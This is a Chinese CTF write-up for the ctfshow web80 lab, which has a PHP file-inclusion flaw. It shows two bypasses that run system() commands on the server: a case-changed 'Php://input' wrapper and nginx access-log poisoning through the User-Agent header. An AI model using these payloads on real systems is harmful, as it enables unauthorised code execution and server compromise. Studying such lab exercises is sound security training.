当前位置: 首页 > article >正文

[ctfshow web入门] web80

article 2025/8/27 5:12:37

信息收集

过滤了phpdata

if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

在这里插入图片描述

日志绕过

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

在这里插入图片描述

web79    目录    web81

http://www.lryc.cn/news/2400990.html

相关文章:

  • 【设计模式-4.5】行为型——迭代器模式
  • C++_核心编程_继承中的对象模型
  • 使用cephadm离线部署reef 18版并配置对接openstack
  • Redis最佳实践——性能优化技巧之缓存预热与淘汰策略
  • 2024年数维杯国际大学生数学建模挑战赛D题城市弹性与可持续发展能力评价解题全过程论文及程序
  • 3D Gaussian splatting 06: 代码阅读-训练参数
  • QT聊天项目DAY13
  • Web3如何重塑数据隐私的未来
  • 【鸿蒙】HarmonyOS NEXT之如何正常加载地图组件
  • 前端框架进化史
  • “轻量应用服务器” vs. “云服务器CVM”:小白入门腾讯云,哪款“云机”更适合你?(场景、配置、价格对比解析)
  • day63—回溯—全排列(LeetCode-46)
  • (二)stm32使用4g模块(移远ec800k)连接mqtt
  • 防火墙iptables项目实战
  • webpack继续学习
  • Scrapy爬虫框架Spiders爬虫脚本使用技巧
  • PowerBI企业运营分析—全动态盈亏平衡分析
  • docker的基本命令
  • 【运维实战】Rsync将一台主Web服务器上的文件和目录同步到另一台备份服务器!
  • 实时通信RTC与传统直播的异同
  • Python-正则表达式(re 模块)
  • AgenticSeek 本地部署教程(Windows 系统)
  • 基于 qiankun + vite + vue3 构建微前端应用实践
  • VR教育:开启教育新时代的钥匙
  • 机器学习:逻辑回归与混淆矩阵
  • 20250602在荣品的PRO-RK3566开发板的Android13下打开HDMI显示
  • 【学习记录】快速上手 PyQt6:设置 Qt Designer、PyUIC 和 PyRCC 在 PyCharm中的应用
  • AI在网络安全领域的应用现状和实践
  • DrissionPage 异常处理实战指南:构建稳健的网页自动化防线
  • 鸿蒙任务项设置案例实战